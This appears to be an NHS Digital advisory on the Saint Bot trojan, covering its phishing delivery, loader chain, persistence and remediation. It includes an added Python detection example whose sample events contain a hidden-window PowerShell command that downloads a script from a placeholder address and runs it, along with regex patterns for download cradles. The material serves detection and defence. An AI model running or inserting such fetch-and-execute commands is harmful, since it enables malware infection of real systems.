Saint Bot Trojan
Summary
First seen in early 2021, Saint Bot is a downloader trojan whose pool of affiliates has been growing steadily. Most of the campaigns it has featured in delivered the Taurus infostealer, although a significant minority dropped the Glupteba backdoor.
Affected platforms
The following platforms are known to be affected:
Threat details
Introduction
Saint Bot is a newly observed downloader trojan that has been delivering the Taurus Stealer and Glupteba malware in COVID-themed campaigns. Despite being relatively new, it uses a number of advanced techniques, suggesting its creators are more experienced than a newly observed family would imply.
Delivery
Saint Bot is delivered via phishing emails carrying ZIP attachments that contain LNK files. When opened, the LNK file points to a download URL from which it pulls and executes an initial PowerShell loader in the %TEMP% folder. This loader then downloads and executes two further executables: the first is a batch script that attempts to disable Windows Defender, while the other contains Saint Bot itself.
Activities
Once executed, Saint Bot drops several scripts that control its other components, along with its own copy of ntdll, which it uses in place of the legitimate version. It then performs an emulation check and a locale check to determine which region the affected system is in, terminating itself if the system appears to be in any member state of the Commonwealth of Independent States. A Run registry key is created to ensure persistence.
Saint Bot then attempts to contact one of several hardcoded command and control (C2) addresses and sends system information to any server that responds. The C2 server in turn passes it download URLs for new payloads.
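The delivery chain and persistence step described above map onto host telemetry that most organisations already collect. The following is an added example, not NHS Digital's guidance text nor any code from Saint Bot itself: it runs three heuristics over constructed Sysmon-style process-creation (Event ID 1) and registry-value-set (Event ID 13) records and then correlates hits along the parent/child process chain, so that a hidden-window PowerShell download cradle, an EXE launched from %TEMP% by that PowerShell, and a Run key pointing into a user-writable path are reported together rather than as three isolated alerts. The event records, user name, file names, and the 203.0.113.10 address are invented for illustration; this page publishes no indicators of compromise, and none are implied here.

```python
"""Heuristic detection of the Saint Bot-style delivery chain over constructed
Sysmon-like events. Added example; field names follow Sysmon (EventID 1 =
process create, EventID 13 = registry value set). All sample data is invented.
"""
import re

# Directories an ordinary user can write to; a persisted binary living here
# is far more suspicious than one under Program Files or System32.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer)", re.I)
TEMP_REF = re.compile(r"(\$env:TEMP|%TEMP%|\\Temp\\)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
POWERSHELL = re.compile(r"\\(powershell(_ise)?|pwsh)\.exe$", re.I)

# Constructed sample: one benign scripted PowerShell run (pid 4000) and the
# phishing chain LNK -> hidden PowerShell loader (5100) -> two EXEs in %TEMP%
# (5120, 5130) -> Run key written by the second EXE. Invented values throughout.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4000, "ParentProcessId": 1200,
     "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"EventID": 1, "ProcessId": 5100, "ParentProcessId": 1200,
     "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://203.0.113.10/ld.ps1 '
                    r'-OutFile $env:TEMP\ld.ps1; . $env:TEMP\ld.ps1"'},
    {"EventID": 1, "ProcessId": 5120, "ParentProcessId": 5100, "ParentImage": PS,
     "Image": r"C:\Users\alice\AppData\Local\Temp\def.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\def.exe"},
    {"EventID": 1, "ProcessId": 5130, "ParentProcessId": 5100, "ParentImage": PS,
     "Image": r"C:\Users\alice\AppData\Local\Temp\upd.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\upd.exe"},
    {"EventID": 13, "ProcessId": 5130,
     "Image": r"C:\Users\alice\AppData\Local\Temp\upd.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                     r"\Software\Microsoft\Windows\CurrentVersion\Run\upd",
     "Details": r"C:\Users\alice\AppData\Local\Temp\upd.exe"},
]


def powershell_loader(ev):
    """Rule 1: PowerShell with a hidden window that downloads into %TEMP% and
    runs the result (the initial loader stage)."""
    if ev.get("EventID") != 1 or not POWERSHELL.search(ev.get("Image", "")):
        return False
    cl = ev.get("CommandLine", "")
    return bool(HIDDEN_WINDOW.search(cl) and DOWNLOAD_CRADLE.search(cl)
                and TEMP_REF.search(cl))


def temp_exe_from_powershell(ev):
    """Rule 2: an EXE in a user-writable directory spawned by PowerShell
    (the two executables the loader pulls down)."""
    return (ev.get("EventID") == 1
            and POWERSHELL.search(ev.get("ParentImage", "")) is not None
            and ev.get("Image", "").lower().endswith(".exe")
            and USER_WRITABLE.search(ev.get("Image", "")) is not None)


def run_key_to_user_path(ev):
    """Rule 3: a Run/RunOnce value whose data points into a user-writable
    directory (the persistence step)."""
    return (ev.get("EventID") == 13
            and RUN_KEY.search(ev.get("TargetObject", "")) is not None
            and USER_WRITABLE.search(ev.get("Details", "")) is not None)


RULES = [("powershell_loader", powershell_loader),
         ("temp_exe_from_powershell", temp_exe_from_powershell),
         ("run_key_to_user_path", run_key_to_user_path)]


def detect(events):
    """Return {pid: [rule names fired]} for every process that tripped a rule."""
    hits = {}
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.setdefault(ev["ProcessId"], []).append(name)
    return hits


def correlate(events):
    """Group flagged processes by their highest flagged ancestor and return only
    groups with two or more members, i.e. a multi-stage chain on one lineage."""
    hits = detect(events)
    parent = {ev["ProcessId"]: ev["ParentProcessId"]
              for ev in events if ev.get("EventID") == 1}
    groups = {}
    for pid in hits:
        root = pid
        while parent.get(root) in hits:   # climb while the parent is also flagged
            root = parent[root]
        groups.setdefault(root, set()).add(pid)
    return {root: sorted(pids) for root, pids in groups.items() if len(pids) > 1}


if __name__ == "__main__":
    for pid, rules in detect(SAMPLE_EVENTS).items():
        print(pid, rules)
    print("chains:", correlate(SAMPLE_EVENTS))
```

Each rule on its own will false-positive in a real estate (some deployment tooling uses hidden-window download cradles, and plenty of installers run from %TEMP%), which is why `correlate` only escalates when two or more stages fire on the same parent/child lineage; the benign `backup.ps1` run in the sample is never flagged because it neither hides its window nor downloads anything. The ntdll copy and the CIS locale check described above leave less obvious traces and are not modelled here.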
Remediation advice
To prevent and detect an infection, NHS Digital advises that:
- Secure configurations are applied to all devices.
- Security updates are applied at the earliest opportunity.
- Tamper protection settings in security products are enabled where available.
- Obsolete platforms are segregated from the rest of the network.
- IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
- Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
- Administrative accounts are only used for necessary purposes.
- Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
- Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.
Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.
Indicators of compromise
Last edited: 6 September 2021 11:54 am